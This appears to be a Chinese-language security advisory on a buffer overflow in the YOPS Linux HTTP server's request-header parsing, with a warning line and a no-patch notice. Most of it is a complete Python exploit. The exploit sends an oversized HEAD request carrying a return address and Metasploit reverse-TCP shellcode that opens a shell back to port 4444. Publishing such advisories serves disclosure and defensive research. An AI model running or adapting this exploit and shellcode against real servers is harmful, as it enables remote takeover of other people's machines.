发布日期：2010-09-10
更新日期：2010-11-29

受影响系统：

yoopss YOPS <=2009-11-30

描述：

---

YOPS（Your Own Personal [WEB] Server）是用C语言实现的Linux平台HTTP服务器。

YOPS处理用户请求时存在漏洞，远程攻击者可能利用此漏洞在服务器上执行任意指令。

在http_parse_request_header函数中，应用程序没有对通过HTTP命令(HEAD/GET/POST)接收到的畸形数据做缓冲区边界检查，而将它用作swebs_record_log函数中的logger变量输入。

<*来源：Rodrigo Escobar <ipax () dclabs ! com ! br>
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Rodrigo Escobar <ipax@dclabs.com.br> 提供了如下测试方法：

#!/usr/bin/python
# Software:
# YOPS (Your Own Personal [WEB] Server) is a small SEDA-like HTTP
server for Linux OS written in C.
# URL: http://sourceforge.net/projects/yops2009/
#
# Vulnerability: Rodrigo Escobar aka ipax @ DcLabs
# Exploit: Flavio do Carmo Junior aka waKKu @ DcLabs
# Contact: waKKu <AT> dclabs <DOT> com <DOT> br

HOST = "localhost"
PORT = 8888

import socket
import sys
import time

try:
    BUFF_LEN = int(sys.argv[1])
except:
    BUFF_LEN = 802
FIXUP_ADDR = "\x47\xce\x04\x08"

shellcode = (
# MetaSploit Reverse TCP Shell. Host: 127.0.0.1 - Port: 4444
"\x33\xc9\xb1\x13\xbe\xae\x88\x55\xcb\xda\xcd\xd9\x74\x24\xf4"
"\x5f\x31\x77\x0e\x03\x77\x0e\x83\x69\x8c\xb7\x3e\x44\x56\xc0"
"\x22\xf5\x2b\x7c\xcf\xfb\x22\x63\xbf\x9d\xf9\xe4\x9b\x3f\x6a"
"\x9a\x1b\xbf\x6b\x02\x74\xae\x37\xac\xd7\xba\xd7\x61\x88\xb3"
"\x39\xc2\x42\xa5\xe1\x08\x12\x70\x95\x4a\xa3\xbd\x54\xec\x8d"
"\xb8\x9f\xbd\x65\x15\x4f\x4d\x1e\x01\xa0\xd3\xb7\xbf\x37\xf0"
"\x18\x6c\xc1\x16\x28\x99\x1c\x58\x43"
)


buffer = "HEAD "
buffer += "A"*BUFF_LEN
buffer += FIXUP_ADDR*4
buffer += " HTTP/1.1"

stackadjust = (
        "\xcb" # instruction alignment
        "\xbc\x69\x69\x96\xb0" # Stack Adjustment
)

payload = buffer + stackadjust + shellcode + "\r\n\r\n"

print """
######################################
### DcLabs Security Research Group ###
###            +Exploit+           ###
######################################
Software: YOPS 2009 - Web Server
---
Vulnerability by: ipax
Exploit by: waKKu
Greetings to: All DcLabs members
"""

print " [+] Using BUFF_LEN -> ", str(BUFF_LEN)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print " [+] Trying to establish connection..."
s.connect((HOST, PORT))
print " [+] Sending a dummy request to initialize data..."
s.send("HEAD DcLabs HTTP/1.1\r\n\r\n")
try:
    s.recv(1024)
except:
    pass
s.close()

time.sleep(3)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
print " [+] Sending our malicious payload..."
s.send(payload)
print " [+] Payload sent, good luck!"
s.close()

建议：

---

厂商补丁：

yoopss
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://sourceforge.net/projects/yops2009/

浏览次数：2893
严重程度：0（网友投票）